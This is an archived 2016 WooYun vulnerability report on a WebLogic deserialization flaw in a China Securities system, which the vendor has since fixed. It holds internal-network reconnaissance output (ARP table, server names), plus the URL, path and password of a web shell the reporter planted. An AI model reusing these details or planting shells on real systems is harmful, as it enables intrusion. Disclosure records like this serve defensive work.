中信建投证券某系统存在反序列化命令执行漏洞已shell可威胁内网

编号222276
Urlhttp://www.wooyun.org/bug.php?action=view&id=222276
漏洞状态厂商已经修复
漏洞标题中信建投证券某系统存在反序列化命令执行漏洞已shell可威胁内网
漏洞类型命令执行
厂商csc108.com
白帽子路人甲
提交日期2016-06-23 10:17:00
公开日期2016-07-05 13:57:00
修复时间2016-07-05 13:57:00
确认时间2016-06-23 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank10
漏洞简介
weblogic反序列化命令执行
漏洞细节

st2命令执行也没修
http://yfpt.csc.com.cn:8080/km/login.dhtml

QQ截图20160623095558.png


http://yfpt.csc.com.cn:8080
存在weblogic发序列化命令执行漏洞

QQ截图20160623100553.png


QQ截图20160623100632.png

POC

大量内网信息

Interface: 10.101.28.201 --- 0x10004
Internet Address Physical Address Type
10.101.28.4 00-00-0c-07-ac-04 dynamic
10.101.28.5 00-25-b4-db-96-80 dynamic
10.101.28.6 00-25-b4-db-96-40 dynamic
10.101.28.16 a4-ba-db-4d-19-21 dynamic
10.101.28.20 54-9f-35-22-32-40 dynamic
10.101.28.80 00-26-b9-47-fd-b3 dynamic
10.101.28.81 00-26-b9-47-fa-5d dynamic
10.101.28.116 84-2b-2b-76-72-e2 dynamic
10.101.28.132 00-50-56-ba-4d-c0 dynamic
10.101.28.158 00-50-56-ba-05-a7 dynamic
10.101.28.200 84-2b-2b-5c-39-49 dynamic
10.101.28.218 00-21-97-01-23-fc dynamic
10.101.28.223 00-17-08-58-56-3c dynamic
10.101.28.228 00-10-db-ff-20-00 dynamic
10.101.28.230 00-1b-78-ca-dd-02 dynamic
10.101.28.231 00-50-56-ba-3d-80 dynamic
10.101.29.25 00-22-19-6a-89-95 dynamic
10.101.29.144 00-1e-0b-1f-b5-da dynamic


Server Name            Remark
-------------------------------------------------------------------------------
\\CC-OA-ISABY
\\CSC-FINANCE6
\\CSC_FINANCE3
\\CSC_FINANCE5
\\CSCBJ_MAIL
\\CSCBJ_NOTES
\\JF-AD3
\\JF-ALDBY
\\JF-ALDZY
\\JF-ALGO-CALC1
\\JF-ALGO-CALC2
\\JF-ALGO-ENGINE1
\\JF-ALGO-ENGINE2 jf-algo-engine2
\\JF-AUDIT-WEB4
\\JF-AUTO-OP
\\JF-AUTO-YYB
\\JF-AUTOCENTRWEB
\\JF-CA
\\JF-CALL-CCSBJ
\\JF-CALL-CCXPBY
\\JF-CALL-CCXPZY
\\JF-CALL-JIGOU
\\JF-CALL-XPMID1
\\JF-CALL-XPMID2
\\JF-CERT-YGS1
\\JF-CERT-YGS2
\\JF-CERT-YGS3
\\JF-CITRIX-BJ1
\\JF-CITRIX-BJ3
\\JF-DUANXIN-144
\\JF-DUANXIN-145
\\JF-DUANXIN-146
\\JF-DUANXIN-248
\\JF-DUANXIN-DB1
\\JF-DUANXIN-ZYDB
\\JF-DZJY-SZ
\\JF-EPOSERVER
\\JF-HESUAN-NET1
\\JF-HQ-108HQ
\\JF-HQ-DATA
\\JF-HQ-FHSERVER
\\JF-HQ-HHHQ
\\JF-HQ-SHVLAN4
\\JF-HQ-SZVLAN4
\\JF-HQ-UCTVLAN4
\\JF-INFO-GA
\\JF-INFO-GABAK
\\JF-JC-MID
\\JF-JFJKBY
\\JF-JFJKZY
\\JF-JZ-MONITOR
\\JF-KDS28
\\JF-MFB-YWJ
\\JF-OA-NOTES3 jf-oa-notes3
\\JF-OF-SVR1
\\JF-QH-POBOPTBY jf-qh-poboptby
\\JF-QH-POBOPTZY jf-qh-poboptzy
\\JF-SC-FILETRANS
\\JF-SCOM
\\JF-SCOM1
\\JF-SJCJ-11
\\JF-SJCJ-50
\\JF-SJZX-BB
\\JF-SJZX-SIPF1
\\JF-SOLARWINDS
\\JF-TAPEBACK-1
\\JF-TAPEBACK-2
\\JF-TAPEBACK-3
\\JF-TS-APPL
\\JF-TS-DB
\\JF-TS-GATE
\\JF-TS-GATE1
\\JF-TS-GATE2
\\JF-TS-JYGWBY
\\JF-TS-JYGWZY
\\JF-V-AUTODB
\\JF-V-AUTOJOBWEB
\\JF-WEB-DB
\\JF-WEB-T3
\\JF-WEB-T7
\\JF-WEB-T8
\\JF-WEB-T9
\\JF-WEBJY-006 jf-webjy-006
\\JF-WEBJY-108MS1
\\JF-WEBJY-108MS2
\\JF-WEBJY-140
\\JF-WEBJY-CENTER
\\JF-WEBJY-HQSEND
\\JF-WEBJY-IP
\\JF-WEBJY-LOG
\\JF-WEBJY-MID149
\\JF-WEBJY-MID47
\\JF-WX-SQL
\\JF-XWGL-DBBY
\\JF-XWGL-DBZY
\\JF-YF-ZSGL2
\\JF-YF-ZSGL3
\\JF-YXXT-01
\\JF-YXXT-02
\\JF-YXXT-03
\\JF-YXXT-04
\\JF-YXXT-05
\\JF-YXXT-06
\\JF-ZBYXHC
\\JF-ZCGL-GZDB0
\\JF-ZCGL-GZDB1
\\JF-ZCGL-TADB0
\\JF-ZCGL-TADB1
\\ZXJT-AY27IMKPBR
The command completed successfully.


找到绝对路径后写shell
D:/weblogic_domains/base_domain/servers/YfptServer/tmp/_WL_internal/uddiexplorer/hys9u6/war
http://yfpt.csc.com.cn:8080/uddiexplorer/wooyun.jsp?o=vLogin
密码ninty

QQ截图20160623101034.png


大量内部信息

QQ截图20160623101133.png

修复方案

补丁,删除shell

状态信息 2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-23: 厂商已经确认,细节仅向厂商公开
2016-07-03: 细节向核心白帽子及相关领域专家公开
2016-07-05: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复正在确认中
回应信息危害等级:中漏洞Rank:10 确认时间:2016-06-23 11:35